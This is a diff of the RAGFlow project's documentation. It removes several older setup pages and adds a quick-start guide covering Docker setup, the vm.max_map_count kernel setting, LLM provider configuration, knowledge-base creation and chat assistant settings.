- **Top N** determines the *maximum* number of chunks to feed to the LLM. In other words, even if more chunks are retrieved, only the top N chunks are provided as input.
|
||||
- **Variable**:
|
||||
|
||||
4. Update **Model Setting**:
|
||||
|
||||
- In **Model**: you select the chat model. Though you have selected the default chat model in **System Model Settings**, RAGFlow allows you to choose an alternative chat model for your dialogue.
|
||||
- **Freedom** refers to the level that the LLM improvises. From **Improvise**, **Precise**, to **Balance**, each freedom level corresponds to a unique combination of **Temperature**, **Top P**, **Presence Penalty**, and **Frequency Penalty**.
|
||||
- **Temperature**: Level of the prediction randomness of the LLM. The higher the value, the more creative the LLM is.
|
||||
- **Top P** is also known as "nucleus sampling". See [here](https://en.wikipedia.org/wiki/Top-p_sampling) for more information.
|
||||
- **Max Tokens**: The maximum length of the LLM's responses. Note that the responses may be curtailed if this value is set too low.
|
||||
|
||||
5. Now, let's start the show:
|
||||
|
||||

|
||||
|
||||

|
||||
|
||||
## Update settings of an existing dialogue
|
||||
|
||||
Hover over an intended dialogue **>** **Edit** to show the chat configuration dialogue:
|
||||
|
||||

|
||||
|
||||
## Integrate chat capabilities into your application
|
||||
|
||||
RAGFlow also offers conversation APIs. Hover over your dialogue **>** **Chat Bot API** to integrate RAGFlow's chat capabilities into your application:
|
||||
|
||||

|
||||
@ -1,19 +0,0 @@
|
||||
|
||||
## Set Before Starting The System
|
||||
|
||||
In **user_default_llm** of [service_conf.yaml](./docker/service_conf.yaml), you need to specify LLM factory and your own _API_KEY_.
|
||||
RagFlow supports the flowing LLM factory, and with more coming in the pipeline:
|
||||
|
||||
> [OpenAI](https://platform.openai.com/login?launch), [Tongyi-Qianwen](https://dashscope.console.aliyun.com/model),
|
||||
> [ZHIPU-AI](https://open.bigmodel.cn/), [Moonshot](https://platform.moonshot.cn/docs)
|
||||
|
||||
After sign in these LLM suppliers, create your own API-Key, they all have a certain amount of free quota.
|
||||
|
||||
## After Starting The System
|
||||
|
||||
You can also set API-Key in **User Setting** as following:
|
||||
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/e4e4066c-e964-45ff-bd56-c3fc7fb18bd3" width="1000"/>
|
||||
</div>
|
||||
|
||||
@ -1,66 +0,0 @@
|
||||
# Set vm.max_map_count to at least 262144
|
||||
|
||||
## Linux
|
||||
|
||||
To check the value of `vm.max_map_count`:
|
||||
|
||||
```bash
|
||||
$ sysctl vm.max_map_count
|
||||
```
|
||||
|
||||
Reset `vm.max_map_count` to a value at least 262144 if it is not.
|
||||
|
||||
```bash
|
||||
# In this case, we set it to 262144:
|
||||
$ sudo sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
|
||||
This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
|
||||
|
||||
```bash
|
||||
vm.max_map_count=262144
|
||||
```
|
||||
|
||||
## Mac
|
||||
|
||||
```bash
|
||||
$ screen ~/Library/Containers/com.docker.docker/Data/vms/0/tty
|
||||
$ sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
To exit the screen session, type Ctrl a d.
|
||||
|
||||
## Windows and macOS with Docker Desktop
|
||||
|
||||
The vm.max_map_count setting must be set via docker-machine:
|
||||
|
||||
```bash
|
||||
$ docker-machine ssh
|
||||
$ sudo sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
|
||||
## Windows with Docker Desktop WSL 2 backend
|
||||
|
||||
To manually set it every time you reboot, you must run the following commands in a command prompt or PowerShell window every time you restart Docker:
|
||||
|
||||
```bash
|
||||
$ wsl -d docker-desktop -u root
|
||||
$ sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
If you are on these versions of WSL and you do not want to have to run those commands every time you restart Docker, you can globally change every WSL distribution with this setting by modifying your %USERPROFILE%\.wslconfig as follows:
|
||||
|
||||
```bash
|
||||
[wsl2]
|
||||
kernelCommandLine = "sysctl.vm.max_map_count=262144"
|
||||
```
|
||||
This will cause all WSL2 VMs to have that setting assigned when they start.
|
||||
|
||||
If you are on Windows 11, or Windows 10 version 22H2 and have installed the Microsoft Store version of WSL, you can modify the /etc/sysctl.conf within the "docker-desktop" WSL distribution, perhaps with commands like this:
|
||||
|
||||
```bash
|
||||
$ wsl -d docker-desktop -u root
|
||||
$ vi /etc/sysctl.conf
|
||||
```
|
||||
and appending a line which reads:
|
||||
```bash
|
||||
vm.max_map_count = 262144
|
||||
```
|
||||
@ -1,40 +0,0 @@
|
||||
# Ollama
|
||||
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/2019e7ee-1e8a-412e-9349-11bbf702e549" width="130"/>
|
||||
</div>
|
||||
|
||||
One-click deployment of local LLMs, that is [Ollama](https://github.com/ollama/ollama).
|
||||
|
||||
## Install
|
||||
|
||||
- [Ollama on Linux](https://github.com/ollama/ollama/blob/main/docs/linux.md)
|
||||
- [Ollama Windows Preview](https://github.com/ollama/ollama/blob/main/docs/windows.md)
|
||||
- [Docker](https://hub.docker.com/r/ollama/ollama)
|
||||
|
||||
## Launch Ollama
|
||||
|
||||
Decide which LLM you want to deploy ([here's a list for supported LLM](https://ollama.com/library)), say, **mistral**:
|
||||
```bash
|
||||
$ ollama run mistral
|
||||
```
|
||||
Or,
|
||||
```bash
|
||||
$ docker exec -it ollama ollama run mistral
|
||||
```
|
||||
|
||||
## Use Ollama in RAGFlow
|
||||
|
||||
- Go to 'Settings > Model Providers > Models to be added > Ollama'.
|
||||
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/a9df198a-226d-4f30-b8d7-829f00256d46" width="1300"/>
|
||||
</div>
|
||||
|
||||
> Base URL: Enter the base URL where the Ollama service is accessible, like, `http://<your-ollama-endpoint-domain>:11434`.
|
||||
|
||||
- Use Ollama Models.
|
||||
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/60ff384e-5013-41ff-a573-9a543d237fd3" width="530"/>
|
||||
</div>
|
||||
292
docs/quickstart.mdx
Normal file
292
docs/quickstart.mdx
Normal file
@ -0,0 +1,292 @@
|
||||
---
|
||||
sidebar_position: 1
|
||||
slug: /
|
||||
---
|
||||
|
||||
# Quick start
|
||||
import Tabs from '@theme/Tabs';
|
||||
import TabItem from '@theme/TabItem';
|
||||
|
||||
RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. When integrated with LLMs, it is capable of providing truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
|
||||
|
||||
This quick start guide describes a general process from:
|
||||
|
||||
- Starting up a local RAGFlow server,
|
||||
- Creating a knowledge base,
|
||||
- Intervening with file parsing, to
|
||||
- Establishing an AI chat based on your datasets.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- CPU ≥ 4 cores;
|
||||
- RAM ≥ 16 GB;
|
||||
- Disk ≥ 50 GB;
|
||||
- Docker ≥ 24.0.0 & Docker Compose ≥ v2.26.1.
|
||||
|
||||
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
|
||||
|
||||
## Start up the server
|
||||
|
||||
This section provides instructions on setting up the RAGFlow server on Linux. If you are on a different operating system, no worries. Most steps are alike.
|
||||
|
||||
<details>
|
||||
<summary>1. Ensure <code>vm.max_map_count</code> ≥ 262144:</summary>
|
||||
|
||||
`vm.max_map_count`. This value sets the maximum number of memory map areas a process may have. Its default value is 65530. While most applications require fewer than a thousand maps, reducing this value can result in abmornal behaviors, and the system will throw out-of-memory errors when a process reaches the limitation.
|
||||
|
||||
RAGFlow v0.8.0 uses Elasticsearch for multiple recall. Setting the value of `vm.max_map_count` correctly is crucial to the proper functioning of the Elasticsearch component.
|
||||
|
||||
<Tabs
|
||||
defaultValue="linux"
|
||||
values={[
|
||||
{label: 'Linux', value: 'linux'},
|
||||
{label: 'macOS', value: 'macos'},
|
||||
{label: 'Windows', value: 'windows'},
|
||||
]}>
|
||||
<TabItem value="linux">
|
||||
1.1. Check the value of `vm.max_map_count`:
|
||||
|
||||
```bash
|
||||
$ sysctl vm.max_map_count
|
||||
```
|
||||
|
||||
1.2. Reset `vm.max_map_count` to a value at least 262144 if it is not.
|
||||
|
||||
```bash
|
||||
$ sudo sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
|
||||
:::caution WARNING
|
||||
This change will be reset after a system reboot. If you forget to update the value the next time you start up the server, you may get a `Can't connect to ES cluster` exception.
|
||||
:::
|
||||
|
||||
1.3. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
|
||||
|
||||
```bash
|
||||
vm.max_map_count=262144
|
||||
```
|
||||
</TabItem>
|
||||
<TabItem value="macos">
|
||||
If you are on macOS with Docker Desktop, then you *must* use docker-machine to update `vm.max_map_count`:
|
||||
|
||||
```bash
|
||||
$ docker-machine ssh
|
||||
$ sudo sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
|
||||
:::caution WARNING
|
||||
This change will be reset after a system reboot. If you forget to update the value the next time you start up the server, you may get a `Can't connect to ES cluster` exception.
|
||||
:::
|
||||
</TabItem>
|
||||
<TabItem value="windows">
|
||||
|
||||
#### If you are on Windows with Docker Desktop, then you *must* use docker-machine to set `vm.max_map_count`:
|
||||
|
||||
```bash
|
||||
$ docker-machine ssh
|
||||
$ sudo sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
#### If you are on Windows with Docker Desktop WSL 2 backend, then use docker-desktop to set `vm.max_map_count`:
|
||||
|
||||
1.1. Run the following in WSL:
|
||||
```bash
|
||||
$ wsl -d docker-desktop -u root
|
||||
$ sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
|
||||
:::caution WARNING
|
||||
This change will be reset after you restart Docker. If you forget to update the value the next time you start up the server, you may get a `Can't connect to ES cluster` exception.
|
||||
:::
|
||||
|
||||
1.2. If you do not wish to have to run those commands each time you restart Docker, you can update your `%USERPROFILE%.wslconfig` as follows to keep your change permanent and globally for all WSL distributions:
|
||||
|
||||
```bash
|
||||
[wsl2]
|
||||
kernelCommandLine = "sysctl.vm.max_map_count=262144"
|
||||
```
|
||||
*This causes all WSL2 virtual machines to have that setting assigned when they start.*
|
||||
|
||||
:::note
|
||||
If you are on Windows 11 or Windows 10 version 22H2, and have installed the Microsoft Store version of WSL, you can also update the **/etc/sysctl.conf** within the docker-desktop WSL distribution to keep your change permanent:
|
||||
|
||||
```bash
|
||||
$ wsl -d docker-desktop -u root
|
||||
$ vi /etc/sysctl.conf
|
||||
```
|
||||
|
||||
```bash
|
||||
# Append a line, which reads:
|
||||
vm.max_map_count = 262144
|
||||
```
|
||||
:::
|
||||
</TabItem>
|
||||
</Tabs>
|
||||
|
||||
</details>
|
||||
|
||||
2. Clone the repo:
|
||||
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
```
|
||||
|
||||
3. Build the pre-built Docker images and start up the server:
|
||||
|
||||
> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.8.0`, before running the following commands.
|
||||
|
||||
```bash
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
> The core image is about 9 GB in size and may take a while to load.
|
||||
|
||||
4. Check the server status after having the server up and running:
|
||||
|
||||
```bash
|
||||
$ docker logs -f ragflow-server
|
||||
```
|
||||
|
||||
_The following output confirms a successful launch of the system:_
|
||||
|
||||
```bash
|
||||
____ ______ __
|
||||
/ __ \ ____ _ ____ _ / ____// /____ _ __
|
||||
/ /_/ // __ `// __ `// /_ / // __ \| | /| / /
|
||||
/ _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
|
||||
/_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
|
||||
/____/
|
||||
|
||||
* Running on all addresses (0.0.0.0)
|
||||
* Running on http://127.0.0.1:9380
|
||||
* Running on http://x.x.x.x:9380
|
||||
INFO:werkzeug:Press CTRL+C to quit
|
||||
```
|
||||
|
||||
> If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network anomaly` error because, at that moment, your RAGFlow may not be fully initialized.
|
||||
|
||||
5. In your web browser, enter the IP address of your server and log in to RAGFlow.
|
||||
|
||||
:::caution WARNING
|
||||
With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
|
||||
:::
|
||||
|
||||
## Configure LLMs
|
||||
|
||||
RAGFlow is a RAG engine, and it needs to work with an LLM to offer grounded, hallucination-free question-answering capabilities. For now, RAGFlow supports the following LLMs, and the list is expanding:
|
||||
|
||||
- OpenAI
|
||||
- Tongyi-Qianwen
|
||||
- ZHIPU-AI
|
||||
- Moonshot
|
||||
- DeepSeek-V2
|
||||
- Baichuan
|
||||
- VolcEngine
|
||||
|
||||
> RAGFlow also supports deploying LLMs locally using Ollama or Xinference, but this part is not covered in this quick start guide.
|
||||
|
||||
To add and configure an LLM:
|
||||
|
||||
1. Click on your logo on the top right of the page **>** **Model Providers**:
|
||||
|
||||

|
||||
|
||||
> Each RAGFlow account is able to use **text-embedding-v2** for free, a embedding model of Tongyi-Qianwen. This is why you can see Tongyi-Qianwen in the **Added models** list. And you may need to update your Tongyi-Qianwen API key at a later point.
|
||||
|
||||
2. Click on the desired LLM and update the API key accordingly (DeepSeek-V2 in this case):
|
||||
|
||||

|
||||
|
||||
*Your added models appear as follows:*
|
||||
|
||||

|
||||
|
||||
3. Click **System Model Settings** to select the default models:
|
||||
|
||||
- Chat model,
|
||||
- Embedding model,
|
||||
- Image-to-text model.
|
||||
|
||||

|
||||
|
||||
> Some models, such as the image-to-text model **qwen-vl-max**, are subsidiary to a specific LLM. And you may need to update your API key to access these models.
|
||||
|
||||
## Create your first knowledge base
|
||||
|
||||
You are allowed to upload files to a knowledge base in RAGFlow and parse them into datasets. A knowledge base is virtually a collection of datasets. Question answering in RAGFlow can be based on a particular knowledge base or multiple knowledge bases. File formats that RAGFlow supports include documents (PDF, DOC, DOCX, TXT, MD), tables (CSV, XLSX, XLS), pictures (JPEG, JPG, PNG, TIF, GIF), and slides (PPT, PPTX).
|
||||
|
||||
To create your first knowledge base:
|
||||
|
||||
1. Click the **Knowledge Base** tab in the top middle of the page **>** **Create knowledge base**.
|
||||
|
||||
2. Input the name of your knowledge base and click **OK** to confirm your changes.
|
||||
|
||||
_You are taken to the **Configuration** page of your knowledge base._
|
||||
|
||||

|
||||
|
||||
3. RAGFlow offers multiple chunk templates that cater to different document layouts and file formats. Select the embedding model and chunk method (template) for your knowledge base.
|
||||
|
||||
> IMPORTANT: Once you have selected an embedding model and used it to parse a file, you are no longer allowed to change it. The obvious reason is that we must ensure that all files in a specific knowledge base are parsed using the *same* embedding model (ensure that they are being compared in the same embedding space).
|
||||
|
||||
_You are taken to the **Dataset** page of your knowledge base._
|
||||
|
||||
4. Click **+ Add file** **>** **Local files** to start uploading a particular file to the knowledge base.
|
||||
|
||||
5. In the uploaded file entry, click the play button to start file parsing:
|
||||
|
||||

|
||||
|
||||
_When the file parsing completes, its parsing status changes to **SUCCESS**._
|
||||
|
||||
## Intervene with file parsing
|
||||
|
||||
RAGFlow features visibility and explainability, allowing you to view the chunking results and intervene where necessary. To do so:
|
||||
|
||||
1. Click on the file that completes file parsing to view the chunking results:
|
||||
|
||||
_You are taken to the **Chunk** page:_
|
||||
|
||||

|
||||
|
||||
2. Hover over each snapshot for a quick view of each chunk.
|
||||
|
||||
3. Double click the chunked texts to add keywords or make *manual* changes where necessary:
|
||||
|
||||

|
||||
|
||||
4. In Retrieval testing, ask a quick question in **Test text** to double check if your configurations work:
|
||||
|
||||
_As you can tell from the following, RAGFlow responds with truthful citations._
|
||||
|
||||

|
||||
|
||||
## Set up an AI chat
|
||||
|
||||
Conversations in RAGFlow are based on a particular knowledge base or multiple knowledge bases. Once you have created your knowledge base and finished file parsing, you can go ahead and start an AI conversation.
|
||||
|
||||
1. Click the **Chat** tab in the middle top of the mage **>** **Create an assistant** to show the **Chat Configuration** dialogue *of your next dialogue*.
|
||||
> RAGFlow offer the flexibility of choosing a different chat model for each dialogue, while allowing you to set the default models in **System Model Settings**.
|
||||
|
||||
2. Update **Assistant Setting**:
|
||||
|
||||
- Name your assistant and specify your knowledge bases.
|
||||
- **Empty response**:
|
||||
- If you wish to *confine* RAGFlow's answers to your knowledge bases, leave a response here. Then when it doesn't retrieve an answer, it *uniformly* responds with what you set here.
|
||||
- If you wish RAGFlow to *improvise* when it doesn't retrieve an answer from your knowledge bases, leave it blank, which may give rise to hallucinations.
|
||||
|
||||
3. Update **Prompt Engine** or leave it as is for the beginning.
|
||||
|
||||
4. Update **Model Setting**.
|
||||
|
||||
5. RAGFlow also offers conversation APIs. Hover over your dialogue **>** **Chat Bot API** to integrate RAGFlow's chat capabilities into your applications:
|
||||
|
||||

|
||||
|
||||
6. Now, let's start the show:
|
||||
|
||||

|
||||
|
||||

|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user